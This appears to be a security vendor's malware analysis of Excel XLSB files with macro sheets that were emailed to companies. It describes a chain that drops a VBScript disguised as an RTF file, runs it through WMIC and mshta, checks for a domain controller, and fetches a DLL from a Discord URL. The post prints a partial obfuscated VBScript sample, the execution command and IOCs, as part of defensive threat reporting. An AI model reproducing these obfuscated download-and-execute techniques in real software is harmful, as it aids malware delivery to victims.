Distribution of Malicious Excel Files Targeting Companies Amid Black Friday Season

Malicious Excel files are being distributed to companies amid the Black Friday season. The email confirmed today (Nov 25th) is an email reported by the attacked company in Korea. Attached to the email is an Excel file that contains an Excel 4.0 Macro (XLM) macro sheet in the form of the XLSB excel binary. It checks whether the system is a domain controller then activates additional malicious features.

The filename of the attached Excel file has a format of ‘promo details-[number].xlsb,’ and its file format is XLSB. XLSB is the Excel Binary File Format that has a different file structure from that of XLS and XLSX files. Unlike XLSX which is a string-based XML file format (see figure below), XLSB consists of Hex binary, making it harder for analysts or anti-malware software with targeted file scan feature to decrypt its codes. This is not the first time the malicious XLSB file format is discovered. As distributed files via email mostly took the form of XLS or XLSX file format, this calls for increased attention to the future trend.

XLSB 파일 포맷
Binary file that consists of macro sheet in XLSB file

XML file that consists of macro sheet in XLSX file

Upon running the Excel file, the following is shown, and clicking the image after enabling macro activates integrated malicious features. It appears that this design is to avoid detection measures such as an automatic analysis system. Furthermore, the attacker added ‘protection’ to the Excel file to complicate the file analysis. Given that the macro sheet can only be viewed after entering the valid password, it would be safe to say that the development process of malware has become even more sophisticated.

When the user clicks the image, the file creates a malicious file in the ProgramData directory and runs it via WMIC. The created malicious file is a VBScript file under the disguise of an RTF file. The file is run by using mshta.exe process.

Command line: wmic process call create “mshta C:\ProgramData\cbfyx.rtf”

The executed VBScript contains the following code (partial). The main features of the VBScript are as follows:

  • For the purpose of checking the domain controller connection, uses Wscript.shell to check system’s %USERDOMAIN% and %LOGONSERVER% environment variable
  • If the domain controller connection is not confirmed, doesn’t run the rest of the features
  • If the domain controller connection is confirmed, connects to hxxps://cdn.discordapp.com/<omitted> and downloads malicious DLL file
  • The downloaded malicious DLL file is created with the filename of nianigger.bin in the ProgramData
  • Runs malicious DLL file with Rundll32.exe process C:\ProgramData\nianigger.bin DllRegisterServer
<script type="text/vbscript" LANGUAGE="VBScript" >
G_Q_w_i_Y_t_S_V_Y_W_n_K_s_i_F = "ru" & "" & <strong>Chr</strong>(110+1-1) & "dll" & "32." & "ex" & <strong>Chr</strong>(101+1-1) & <strong>Chr</strong>(32+1-1) & <strong>Chr</strong>(67+1-1) & ":\\" & <strong>Chr</strong>(80+1-1) & "ro" & <strong>Chr</strong>(103+1-1) & "ra" & "mDa" & "" & "ta\" & Chr(110+1-1) & "ian" & Chr(105+1-1) & "gge" & Chr(114+1-1) & ".bi" & "n D" & Chr(108+1-1) & "lR" & "egi" & "ste" & "rS" & "er" & "ve" & "" & <strong>Chr</strong>(114+1-1)
Set Q_o_b_k_v_e_J_u_V_s = <strong>CreateObject</strong>("" & "MSX" & "" & <strong>Chr</strong>(77+1-1) & "L2." & "" & "Se" & "rve" & "rXM" & <strong>Chr</strong>(76+1-1) & "HT" & "TP." & "" & "" & "" & <strong>Chr</strong>(54+1-1) & <strong>Chr</strong>(46+1-1) & <strong>Chr</strong>(48+1-1))

H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k = <strong>Chr</strong>(87+1-1) & "" & "scr" & <strong>Chr</strong>(105+1-1) & "" & "" & "" & "pt." & "Sh" & <strong>Chr</strong>(101+1-1) & "" & <strong>Chr</strong>(108+1-1) & "" & <strong>Chr</strong>(108+1-1)
Set W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z = <strong>CreateObject</strong>(H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k)
w_g_x_q_b_O_S_y_G_g_w_c = <strong>LCase</strong>(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.<strong>expandenvironmentstrings</strong>("%USERDOMAIN%"))
e_K_l_a_I_l_c_E_t =<strong>LCase</strong>(<strong>Replace</strong>(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.<strong>expandenvironmentstrings</strong>("%LOGONSERVER%"), CHR(92+1-1+1-1), ""))
Set q_h_H_U_O_o_S_q = <strong>CreateObject</strong>("" & "" & <strong>Chr</strong>(83+1-1) & "" & "cri" & "pt" & "ing" & <strong>Chr</strong>(46+1-1) & "" & <strong>Chr</strong>(70+1-1) & "ile" & <strong>Chr</strong>(83+1-1) & <strong>Chr</strong>(121+1-1) & "" & "ste" & "mOb" & "" & "je" & <strong>Chr</strong>(99+1-1) & <strong>Chr</strong>(116+1-1))
    
</script>

To summarize, the email and the malicious Excel file found this time is malware that targeted a company. It is estimated that there may be more of these similar attacks using XLSB files even after the Black Friday season ends.

[File Detection]
Downloader/XLS.Generic
Trojan/Win.FJX

[Behavior Detection]
Execution/MDP.Behavior.M3819

[IOC]
9f27881dd96c57de0495bf609b954af5 (EML)
33411e3b8028fe4b8f9786b440d0b098 (EML)
f2c941b14d81c9b6b7a7aa6b98f91ce9 (XLSB)
e73d286a4915a3f62516a701f5ae9467 (XLSB)
ff330965e4d39788c99b9b9c6128983a (DLL)
hxxps://cdn[.]discordapp[.]com/attachments/912720368844824620/913069652077326346/KftJXyrZQyellowfacebrownietacohead.ogg

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

0 0 votes
Article Rating
guest

0 Comments
Inline Feedbacks
View all comments